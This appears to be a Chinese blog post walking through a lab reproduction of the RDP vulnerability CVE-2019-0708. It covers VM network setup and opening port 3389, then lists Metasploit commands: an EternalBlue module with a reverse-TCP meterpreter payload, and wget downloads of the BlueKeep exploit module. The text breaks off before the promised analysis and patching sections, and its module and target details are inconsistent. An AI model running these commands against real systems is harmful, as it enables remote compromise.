CVE20190708复现

本文介绍了CVE20190708漏洞的复现过程,包括实验环境配置、攻击准备(使用Metasploit Framework)、原理分析以及修补方案。通过在Kali Linux上利用msfconsole进行攻击,展示了如何针对Windows Server 2000的RDP漏洞进行远程代码执行。同时,解释了漏洞的产生原因,即RDP连接序列在信道安全属性设置前建立,导致堆内存破坏。建议受影响的系统及时安装微软发布的安全补丁。
摘要由CSDN通过智能技术生成

一、实验环境
基于虚拟机运行(VMware)
(1)靶机(ip:192.168.8.*):
在这里插入图片描述
(2)测试机(192.168.8.#):
在这里插入图片描述
(3)将两个虚拟机设置于同一个网段中
a.在虚拟网络编辑器中,将VMnet0采用桥接模式,并桥接到网线网上
在这里插入图片描述
b.设置win7为动态获取ip
在这里插入图片描述
c.打开/etc/network/interfaces文件,做如下修改,并保存,重启kali
在这里插入图片描述
eth0接口会在系统启动时被自动配置,以DHCP方式配置网卡.
d.两台主机互ping
win7
在这里插入图片描述
kali在这里插入图片描述
互ping测试(关掉防火墙)


测试可以ping通,现在测试机和靶机在同一网段了。
(3)将靶机的相应端口打开
在这里插入图片描述
在防火墙中更改入站设置,同时关闭防火墙,打开3389端口
在这里插入图片描述
观察可知,3389端口已打开
在这里插入图片描述
二、攻击准备(kali中操作)
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

进入框架:msfconsole
使用search命令查找相关漏洞: search ms17-010
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
使用info查看模块信息: info
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数:show options
设置参数:set RHOST 192.168.125.138
攻击:exploit / run

(1)更新kali msf

apt-get update
apt-get  install metasploit-framework

(2)下载利用脚本

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值